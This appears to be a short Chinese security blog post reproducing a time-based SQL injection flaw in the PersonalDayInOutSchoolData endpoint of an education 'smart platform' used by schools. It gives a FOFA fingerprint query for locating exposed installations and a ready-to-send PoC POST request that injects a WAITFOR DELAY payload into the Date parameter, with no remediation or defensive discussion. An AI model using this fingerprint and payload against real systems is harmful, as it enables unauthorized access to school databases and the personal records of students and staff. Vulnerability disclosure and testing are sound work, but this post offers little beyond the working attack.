EDU 某智慧平台 PersonalDayInOutSchoolData SQL注入漏洞复现

OidBoy_G2024-09-23 1:33

FOFA:body="custom/blue/uimaker/easyui.css"

PoC

复制代码 
POST /ashx/APP/InOutSchoolService.ashx?action=PersonalDayInOutSchoolData&Date=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&AccountNo=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

延时5秒

相关推荐
星幻元宇VR22 分钟前
VR科普学习一体机|让知识触手可及的沉浸式科普新方式
科技·学习·安全·生活·vr
mooyuan天天35 分钟前
AI大模型辅助Web渗透测试-TRAE智能体自动化解CTF题(命令执行 powershell)
人工智能·web安全·渗透测试·ctf·ai辅助渗透测试
其实防守也摸鱼2 小时前
Web漏洞全景解析:从原理溯源到实战攻防的进阶指南
网络·web安全·网络安全·学习笔记·web类型漏洞
wuyoula2 小时前
Python IP服务器防火墙源码解析与应用——网站安全防护策略探讨
服务器·tcp/ip·安全
货拉拉技术2 小时前
自学习机制下的 API 资产分类实践
安全·机器学习·api
老张的张Z2 小时前
CISSP 域3知识点 物理安全
安全·网络安全·安全架构
Amy187021118232 小时前
漏电流:看不见的电气隐患,剩余电流动作继电器如何筑牢安全防线?
安全
老张的张Z3 小时前
CISSP 域4知识点 网络组件安全
网络·安全
安全测评-Sean3 小时前
2026年安全度量厂商能力横评
安全
kyriewen3 小时前
你的网站被“下毒”了?XSS和CSRF:前端安全的两大“毒瘤”
前端·javascript·安全
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点03一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛04GPT-6核心能力解析及与现有主流大模型对比05基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南06零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)07AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析08免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手09从限购到畅通:GLM-5.1 Coding Plan接入攻略10CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南